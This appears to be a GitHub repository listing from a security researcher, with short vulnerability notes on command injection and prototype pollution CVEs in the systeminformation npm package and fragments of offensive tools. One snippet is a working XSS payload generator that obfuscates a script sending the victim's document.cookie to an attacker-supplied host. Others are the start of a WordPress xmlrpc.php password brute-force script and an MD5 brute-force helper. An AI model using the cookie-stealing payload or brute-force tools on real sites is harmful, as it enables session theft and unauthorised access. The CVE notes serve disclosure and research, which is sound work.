EffectRenan

...

EffectRenan

Vulnerability: Command Injection - CVE-2020-26274

Package name: systeminformation.

Tested package versions: 4.31.0.

Fixed package versions: >= 4.31.1.

Description: The attacker can send an OS command into quotation marks and it going to be executed.

EffectRenan

Vulnerability: Prototype Pollution - CVE-2020-7778, CVE-2020-26245

Package name: systeminformation.

Tested package versions: 4.30.1, 4.30.2, 4.30.4

Fixed package versions: >= 4.30.5

Description: The attacker can overwrite the properties and functions of an object. It can lead to executing OS commands.

EffectRenan

Vulnerability: Command Injection - CVE-2020-7752

References:

• Snyk
• Mitre Corporation

Package name: systeminformation

Tested package versions: 4.27.9, 4.27.10

EffectRenan

function generate(host, com) {
  const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com;
  let encoded = command[0].charCodeAt();

  for (var i = 1; i < command.length; i++) {
      encoded += ',' + command[i].charCodeAt();
  }
  encoded = `eval(String.fromCharCode(${encoded}))`;
  console.log(encoded);
  return encoded;

EffectRenan

# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.letters + string.digits
def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    global CHARS
    while not stop_event.is_set():

EffectRenan

#!/bin/bash

if [[ $1 == '' || $2 == '' ]]
then
    echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>"
    exit
fi

USER="admin"